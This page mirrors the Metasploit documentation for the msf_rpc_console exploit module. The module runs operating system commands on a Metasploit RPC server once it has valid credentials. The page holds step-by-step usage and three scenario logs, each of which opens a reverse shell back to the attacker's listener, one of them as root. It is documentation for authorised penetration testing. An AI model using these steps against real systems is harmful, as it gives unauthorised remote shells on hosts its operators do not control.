CoCalc -- msf_rpc

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/multi/misc/msf_rpc_console.md
Views: ¹⁹⁰⁴

Description

This module connects to a specified Metasploit RPC server and uses the console.write procedure to execute operating system commands. Valid credentials are required to access the RPC interface.

Vulnerable Application

Metasploit is the world's most used penetration testing software. The RPC API can be used to programmatically drive the Metasploit Framework and Metasploit Pro products.

To start the RPC service, run msfrpcd -U msf -P abc123; or run load msgrpc ServerHost=0.0.0.0 ServerPort=55552 User=msf Pass=abc123 SSL=Y from within msfconsole.

This module has been tested successfully on:

Metasploit 4.15 on Kali 1.0.6
Metasploit 4.14 on Kali 2017.1
Metasploit 4.14 on Windows 7 SP1

Source and Installers:

Verification Steps

Start msfconsole
Do: use exploit/multi/misc/msf_rpc_console
Do: set RHOST [IP]
Do: set RPORT [PORT] (default: 55552)
Do: set USERNAME [USERNAME] (default: msf)
Do: set PASSWORD [PASSWORD]
Do: set LHOST [IP]
Do: run
You should get a session

Options

Username

The username for Metasploit RPC (default: msf).

Password

The password for the RPC user.

Scenarios

Ruby Target

msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(msf_rpc_console) > set username msf
username => msf
msf exploit(msf_rpc_console) > set password abc123
password => abc123
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
lhost => 172.16.191.181
msf exploit(msf_rpc_console) > set target 0
target => 0
msf exploit(msf_rpc_console) > run

[*] Started reverse TCP handler on 172.16.191.181:4444
[+] 172.16.191.166:55552 - Authenticated successfully
[*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
[*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
[*] 172.16.191.166:55552 - API version 1.0
[+] 172.16.191.166:55552 - Created console #0
[*] 172.16.191.166:55552 - Sending payload...
[*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.166:52984) at 2017-07-05 03:40:50 -0400

whoami
win-sgbsd5tqutq\user

Windows CMD Target

msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(msf_rpc_console) > set username msf
username => msf
msf exploit(msf_rpc_console) > set password abc123
password => abc123
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
lhost => 172.16.191.181
msf exploit(msf_rpc_console) > set target 0
target => 1
msf exploit(msf_rpc_console) > set payload cmd/windows/powershell_reverse_tcp
payload => cmd/windows/powershell_reverse_tcp
msf exploit(msf_rpc_console) > run

[*] Started reverse SSL handler on 172.16.191.181:4444
[+] 172.16.191.166:55552 - Authenticated successfully
[*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
[*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
[*] 172.16.191.166:55552 - API version 1.0
[+] 172.16.191.166:55552 - Created console #1
[*] 172.16.191.166:55552 - Sending payload...
[*] Powershell session session 2 opened (172.16.191.181:4444 -> 172.16.191.166:52996) at 2017-07-05 03:44:05 -0400

Windows PowerShell running as user user on WIN-SGBSD5TQUTQ
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\metasploit>whoami
win-sgbsd5tqutq\user

Unix CMD Target

msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.215
rhost => 172.16.191.215
msf exploit(msf_rpc_console) > set username msf
username => msf
msf exploit(msf_rpc_console) > set password abc123
password => abc123
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
lhost => 172.16.191.181
msf exploit(msf_rpc_console) > set target 2
target => 2
msf exploit(msf_rpc_console) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf exploit(msf_rpc_console) > run

[*] Started reverse TCP handler on 172.16.191.181:4444
[+] 172.16.191.215:55552 - Authenticated successfully
[*] 172.16.191.215:55552 - Metasploit 4.15.0-dev-aceeedc
[*] 172.16.191.215:55552 - Ruby 2.3.0 x86_64-linux 2015-12-25
[*] 172.16.191.215:55552 - API version 1.0
[+] 172.16.191.215:55552 - Created console #0
[*] 172.16.191.215:55552 - Sending payload...
[*] Command shell session 3 opened (172.16.191.181:4444 -> 172.16.191.215:40768) at 2017-07-05 03:46:11 -0400

id
uid=0(root) gid=0(root) groups=0(root)